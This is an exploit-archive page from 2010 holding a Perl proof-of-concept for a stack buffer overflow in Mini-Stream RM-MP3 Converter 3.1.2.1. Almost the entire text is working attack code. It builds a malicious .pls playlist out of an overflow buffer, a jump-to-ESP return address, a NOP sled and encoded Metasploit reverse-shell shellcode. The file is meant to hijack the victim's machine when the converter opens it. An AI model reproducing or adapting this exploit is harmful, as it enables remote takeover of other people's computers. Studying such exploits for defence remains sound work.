Mini-Stream RM-MP3 Converter v3.1.2.1 (.pls) Stack Buffer Ov

Posted on 16 July 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Mini-Stream RM-MP3 Converter v3.1.2.1 (.pls) Stack Buffer Overflow</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>============================================================================
Mini-Stream RM-MP3 Converter v3.1.2.1 (.pls) Stack Buffer Overflow universal
============================================================================


#Mini-Stream RM-MP3 Converter v3.1.2.1 (.pls) Stack Buffer Overflow
universal
#By Madjix (lemail ma3andkoum madirou bih)
#Sec4ever.com
my $junk=&quot;http://&quot;.&quot;x41&quot; x 17425;
my $ret = &quot;xCFxDAx05x10&quot;; #jump to ESP - from msrmfilter03.dll
my $padding = &quot;x90&quot; x 24;
# windows/shell_reverse_tcp - 739 bytes
# http://www.metasploit.com
my $shellcode =
&quot;x56x54x58x36x33x30x56x58x48x34x39x48x48x48&quot; .
&quot;x50x68x59x41x41x51x68x5ax59x59x59x59x41x41&quot; .
&quot;x51x51x44x44x44x64x33x36x46x46x46x46x54x58&quot; .
&quot;x56x6ax30x50x50x54x55x50x50x61x33x30x31x30&quot; .
&quot;x38x39x49x49x49x49x49x49x49x49x49x49x49x49&quot; .
&quot;x49x49x49x49x49x37x51x5ax6ax41x58x50x30x41&quot; .
&quot;x30x41x6bx41x41x51x32x41x42x32x42x42x30x42&quot; .
&quot;x42x41x42x58x50x38x41x42x75x4ax49x49x6cx4a&quot; .
&quot;x48x4fx79x47x70x47x70x45x50x45x30x4ex69x48&quot; .
&quot;x65x50x31x4ax72x51x74x4cx4bx42x72x44x70x4e&quot; .
&quot;x6bx46x32x44x4cx4cx4bx51x42x45x44x4ex6bx51&quot; .
&quot;x62x47x58x44x4fx48x37x50x4ax46x46x50x31x49&quot; .
&quot;x6fx45x61x4bx70x4ex4cx45x6cx43x51x43x4cx45&quot; .
&quot;x52x46x4cx45x70x49x51x48x4fx44x4dx47x71x4f&quot; .
&quot;x37x48x62x48x70x46x32x42x77x4ex6bx42x72x46&quot; .
&quot;x70x4cx4bx51x52x45x6cx43x31x4ax70x4cx4bx47&quot; .
&quot;x30x50x78x4bx35x49x50x51x64x43x7ax46x61x4a&quot; .
&quot;x70x46x30x4cx4bx47x38x47x68x4ex6bx43x68x47&quot; .
&quot;x50x45x51x4ax73x4ax43x47x4cx51x59x4cx4bx50&quot; .
&quot;x34x4cx4bx47x71x48x56x44x71x49x6fx46x51x4f&quot; .
&quot;x30x4cx6cx49x51x48x4fx44x4dx46x61x4fx37x46&quot; .
&quot;x58x49x70x50x75x49x64x43x33x43x4dx49x68x45&quot; .
&quot;x6bx43x4dx51x34x50x75x4ax42x51x48x4ex6bx50&quot; .
&quot;x58x51x34x43x31x4ax73x43x56x4ex6bx44x4cx42&quot; .
&quot;x6bx4ex6bx51x48x45x4cx47x71x48x53x4ex6bx45&quot; .
&quot;x54x4ex6bx45x51x4ax70x4cx49x51x54x45x74x45&quot; .
&quot;x74x43x6bx51x4bx51x71x50x59x43x6ax46x31x49&quot; .
&quot;x6fx49x70x50x58x43x6fx42x7ax4ex6bx44x52x4a&quot; .
&quot;x4bx4fx76x51x4dx51x78x45x63x50x32x47x70x47&quot; .
&quot;x70x50x68x51x67x44x33x46x52x51x4fx50x54x50&quot; .
&quot;x68x42x6cx50x77x47x56x47x77x4bx4fx4ax75x4e&quot; .
&quot;x58x4ex70x46x61x45x50x47x70x46x49x4fx34x50&quot; .
&quot;x54x46x30x50x68x46x49x4dx50x50x6bx45x50x49&quot; .
&quot;x6fx4bx65x50x50x42x70x42x70x42x70x47x30x50&quot; .
&quot;x50x43x70x46x30x43x58x4ax4ax44x4fx49x4fx4b&quot; .
&quot;x50x4bx4fx48x55x4fx79x49x57x43x58x49x50x4d&quot; .
&quot;x78x47x71x47x71x43x58x46x62x43x30x42x31x51&quot; .
&quot;x4cx4cx49x4dx36x43x5ax46x70x42x76x42x77x45&quot; .
&quot;x38x4ax39x4dx75x44x34x51x71x4bx4fx4ex35x51&quot; .
&quot;x78x43x53x50x6dx45x34x43x30x4bx39x48x63x50&quot; .
&quot;x57x43x67x46x37x50x31x4bx46x51x7ax46x72x42&quot; .
&quot;x79x43x66x4dx32x49x6dx45x36x4fx37x50x44x46&quot; .
&quot;x44x47x4cx46x61x46x61x4cx4dx43x74x44x64x42&quot; .
&quot;x30x4ax66x47x70x51x54x51x44x42x70x46x36x42&quot; .
&quot;x76x51x46x43x76x46x36x50x4ex51x46x43x66x51&quot; .
&quot;x43x50x56x51x78x42x59x48x4cx45x6fx4bx36x49&quot; .
&quot;x6fx4ex35x4ex69x4bx50x50x4ex43x66x51x56x4b&quot; .
&quot;x4fx46x50x50x68x46x68x4ex67x47x6dx45x30x4b&quot; .
&quot;x4fx49x45x4fx4bx4ax50x4cx75x4dx72x43x66x43&quot; .
&quot;x58x4dx76x4ex75x4fx4dx4dx4dx4bx4fx4ax75x47&quot; .
&quot;x4cx43x36x43x4cx44x4ax4dx50x4bx4bx4dx30x43&quot; .
&quot;x45x47x75x4fx4bx50x47x46x73x44x32x50x6fx42&quot; .
&quot;x4ax47x70x46x33x49x6fx4ax75x41x41&quot;;
open(MYFILE,'&gt;&gt;Sec4Ever.pls');
print MYFILE $junk.$ret.$padding.$shellcode;
close(MYFILE);


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-16]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
TOP
Malware :

Last 20
Exploits :

Last 20